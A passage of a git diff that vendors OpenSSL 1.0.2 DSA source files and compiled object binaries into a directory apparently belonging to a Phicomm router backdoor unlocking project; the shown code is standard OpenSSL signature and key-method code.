+     * Calculate W = inv(S) mod Q save W in u2
+     */
+    if ((BN_mod_inverse(&u2, sig->s, dsa->q, ctx)) == NULL)
+        goto err;
+
+    /* save M in u1 */
+    if (dgst_len > (i >> 3))
+        /*
+         * if the digest length is greater than the size of q use the
+         * BN_num_bits(dsa->q) leftmost bits of the digest, see fips 186-3,
+         * 4.2
+         */
+        dgst_len = (i >> 3);
+    if (BN_bin2bn(dgst, dgst_len, &u1) == NULL)
+        goto err;
+
+    /* u1 = M * w mod q */
+    if (!BN_mod_mul(&u1, &u1, &u2, dsa->q, ctx))
+        goto err;
+
+    /* u2 = r * w mod q */
+    if (!BN_mod_mul(&u2, sig->r, &u2, dsa->q, ctx))
+        goto err;
+
+    if (dsa->flags & DSA_FLAG_CACHE_MONT_P) {
+        mont = BN_MONT_CTX_set_locked(&dsa->method_mont_p,
+                                      CRYPTO_LOCK_DSA, dsa->p, ctx);
+        if (!mont)
+            goto err;
+    }
+
+    DSA_MOD_EXP(goto err, dsa, &t1, dsa->g, &u1, dsa->pub_key, &u2, dsa->p,
+                ctx, mont);
+    /* BN_copy(&u1,&t1); */
+    /* let u1 = u1 mod q */
+    if (!BN_mod(&u1, &t1, dsa->q, ctx))
+        goto err;
+
+    /*
+     * V is now in u1.  If the signature is correct, it will be equal to R.
+     */
+    ret = (BN_ucmp(&u1, sig->r) == 0);
+
+ err:
+    if (ret < 0)
+        DSAerr(DSA_F_DSA_DO_VERIFY, ERR_R_BN_LIB);
+    if (ctx != NULL)
+        BN_CTX_free(ctx);
+    BN_free(&u1);
+    BN_free(&u2);
+    BN_free(&t1);
+    return (ret);
+}
+
+static int dsa_init(DSA *dsa)
+{
+    dsa->flags |= DSA_FLAG_CACHE_MONT_P;
+    return (1);
+}
+
+static int dsa_finish(DSA *dsa)
+{
+    if (dsa->method_mont_p)
+        BN_MONT_CTX_free(dsa->method_mont_p);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_ossl.o
new file mode 100644
index 0000000000000000000000000000000000000000..18950d8506e97fea8377d3104c3d9d9bcd486d3f
GIT binary patch
literal 7336
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.c
new file mode 100644
index 0000000..42b8bb0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.c
@@ -0,0 +1,312 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+#include <openssl/evp.h>
+#include <openssl/bn.h>
+#include "evp_locl.h"
+#include "dsa_locl.h"
+
+/* DSA pkey context structure */
+
+typedef struct {
+    /* Parameter gen parameters */
+    int nbits;                  /* size of p in bits (default: 1024) */
+    int qbits;                  /* size of q in bits (default: 160) */
+    const EVP_MD *pmd;          /* MD for parameter generation */
+    /* Keygen callback info */
+    int gentmp[2];
+    /* message digest */
+    const EVP_MD *md;           /* MD for the signature */
+} DSA_PKEY_CTX;
+
+static int pkey_dsa_init(EVP_PKEY_CTX *ctx)
+{
+    DSA_PKEY_CTX *dctx;
+    dctx = OPENSSL_malloc(sizeof(DSA_PKEY_CTX));
+    if (!dctx)
+        return 0;
+    dctx->nbits = 1024;
+    dctx->qbits = 160;
+    dctx->pmd = NULL;
+    dctx->md = NULL;
+
+    ctx->data = dctx;
+    ctx->keygen_info = dctx->gentmp;
+    ctx->keygen_info_count = 2;
+
+    return 1;
+}
+
+static int pkey_dsa_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    DSA_PKEY_CTX *dctx, *sctx;
+    if (!pkey_dsa_init(dst))
+        return 0;
+    sctx = src->data;
+    dctx = dst->data;
+    dctx->nbits = sctx->nbits;
+    dctx->qbits = sctx->qbits;
+    dctx->pmd = sctx->pmd;
+    dctx->md = sctx->md;
+    return 1;
+}
+
+static void pkey_dsa_cleanup(EVP_PKEY_CTX *ctx)
+{
+    DSA_PKEY_CTX *dctx = ctx->data;
+    if (dctx)
+        OPENSSL_free(dctx);
+}
+
+static int pkey_dsa_sign(EVP_PKEY_CTX *ctx, unsigned char *sig,
+                         size_t *siglen, const unsigned char *tbs,
+                         size_t tbslen)
+{
+    int ret, type;
+    unsigned int sltmp;
+    DSA_PKEY_CTX *dctx = ctx->data;
+    DSA *dsa = ctx->pkey->pkey.dsa;
+
+    if (dctx->md)
+        type = EVP_MD_type(dctx->md);
+    else
+        type = NID_sha1;
+
+    ret = DSA_sign(type, tbs, tbslen, sig, &sltmp, dsa);
+
+    if (ret <= 0)
+        return ret;
+    *siglen = sltmp;
+    return 1;
+}
+
+static int pkey_dsa_verify(EVP_PKEY_CTX *ctx,
+                           const unsigned char *sig, size_t siglen,
+                           const unsigned char *tbs, size_t tbslen)
+{
+    int ret, type;
+    DSA_PKEY_CTX *dctx = ctx->data;
+    DSA *dsa = ctx->pkey->pkey.dsa;
+
+    if (dctx->md)
+        type = EVP_MD_type(dctx->md);
+    else
+        type = NID_sha1;
+
+    ret = DSA_verify(type, tbs, tbslen, sig, siglen, dsa);
+
+    return ret;
+}
+
+static int pkey_dsa_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    DSA_PKEY_CTX *dctx = ctx->data;
+    switch (type) {
+    case EVP_PKEY_CTRL_DSA_PARAMGEN_BITS:
+        if (p1 < 256)
+            return -2;
+        dctx->nbits = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DSA_PARAMGEN_Q_BITS:
+        if (p1 != 160 && p1 != 224 && p1 && p1 != 256)
+            return -2;
+        dctx->qbits = p1;
+        return 1;
+
+    case EVP_PKEY_CTRL_DSA_PARAMGEN_MD:
+        if (EVP_MD_type((const EVP_MD *)p2) != NID_sha1 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha224 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha256) {
+            DSAerr(DSA_F_PKEY_DSA_CTRL, DSA_R_INVALID_DIGEST_TYPE);
+            return 0;
+        }
+        dctx->md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_MD:
+        if (EVP_MD_type((const EVP_MD *)p2) != NID_sha1 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_dsa &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_dsaWithSHA &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha224 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha256 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha384 &&
+            EVP_MD_type((const EVP_MD *)p2) != NID_sha512) {
+            DSAerr(DSA_F_PKEY_DSA_CTRL, DSA_R_INVALID_DIGEST_TYPE);
+            return 0;
+        }
+        dctx->md = p2;
+        return 1;
+
+    case EVP_PKEY_CTRL_GET_MD:
+        *(const EVP_MD **)p2 = dctx->md;
+        return 1;
+
+    case EVP_PKEY_CTRL_DIGESTINIT:
+    case EVP_PKEY_CTRL_PKCS7_SIGN:
+    case EVP_PKEY_CTRL_CMS_SIGN:
+        return 1;
+
+    case EVP_PKEY_CTRL_PEER_KEY:
+        DSAerr(DSA_F_PKEY_DSA_CTRL,
+               EVP_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE);
+        return -2;
+    default:
+        return -2;
+
+    }
+}
+
+static int pkey_dsa_ctrl_str(EVP_PKEY_CTX *ctx,
+                             const char *type, const char *value)
+{
+    if (!strcmp(type, "dsa_paramgen_bits")) {
+        int nbits;
+        nbits = atoi(value);
+        return EVP_PKEY_CTX_set_dsa_paramgen_bits(ctx, nbits);
+    }
+    if (!strcmp(type, "dsa_paramgen_q_bits")) {
+        int qbits = atoi(value);
+        return EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DSA, EVP_PKEY_OP_PARAMGEN,
+                                 EVP_PKEY_CTRL_DSA_PARAMGEN_Q_BITS, qbits,
+                                 NULL);
+    }
+    if (!strcmp(type, "dsa_paramgen_md")) {
+        return EVP_PKEY_CTX_ctrl(ctx, EVP_PKEY_DSA, EVP_PKEY_OP_PARAMGEN,
+                                 EVP_PKEY_CTRL_DSA_PARAMGEN_MD, 0,
+                                 (void *)EVP_get_digestbyname(value));
+    }
+    return -2;
+}
+
+static int pkey_dsa_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    DSA *dsa = NULL;
+    DSA_PKEY_CTX *dctx = ctx->data;
+    BN_GENCB *pcb, cb;
+    int ret;
+    if (ctx->pkey_gencb) {
+        pcb = &cb;
+        evp_pkey_set_cb_translate(pcb, ctx);
+    } else
+        pcb = NULL;
+    dsa = DSA_new();
+    if (!dsa)
+        return 0;
+    ret = dsa_builtin_paramgen(dsa, dctx->nbits, dctx->qbits, dctx->pmd,
+                               NULL, 0, NULL, NULL, NULL, pcb);
+    if (ret)
+        EVP_PKEY_assign_DSA(pkey, dsa);
+    else
+        DSA_free(dsa);
+    return ret;
+}
+
+static int pkey_dsa_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    DSA *dsa = NULL;
+    if (ctx->pkey == NULL) {
+        DSAerr(DSA_F_PKEY_DSA_KEYGEN, DSA_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    dsa = DSA_new();
+    if (!dsa)
+        return 0;
+    EVP_PKEY_assign_DSA(pkey, dsa);
+    /* Note: if error return, pkey is freed by parent routine */
+    if (!EVP_PKEY_copy_parameters(pkey, ctx->pkey))
+        return 0;
+    return DSA_generate_key(pkey->pkey.dsa);
+}
+
+const EVP_PKEY_METHOD dsa_pkey_meth = {
+    EVP_PKEY_DSA,
+    EVP_PKEY_FLAG_AUTOARGLEN,
+    pkey_dsa_init,
+    pkey_dsa_copy,
+    pkey_dsa_cleanup,
+
+    0,
+    pkey_dsa_paramgen,
+
+    0,
+    pkey_dsa_keygen,
+
+    0,
+    pkey_dsa_sign,
+
+    0,
+    pkey_dsa_verify,
+
+    0, 0,
+
+    0, 0, 0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    0, 0,
+
+    pkey_dsa_ctrl,
+    pkey_dsa_ctrl_str
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_pmeth.o
new file mode 100644
index 0000000000000000000000000000000000000000..19d43df1326c47d11e6b278302b038c4a1f746ed
GIT binary patch
literal 6864
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
Re@Xn03}dIzmm<#o{{r}EwIu)m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.c
new file mode 100644
index 0000000..ce690df
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dsa/dsa_prn.c
@@ -0,0 +1,119 @@
+/* crypto/dsa/dsa_prn.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
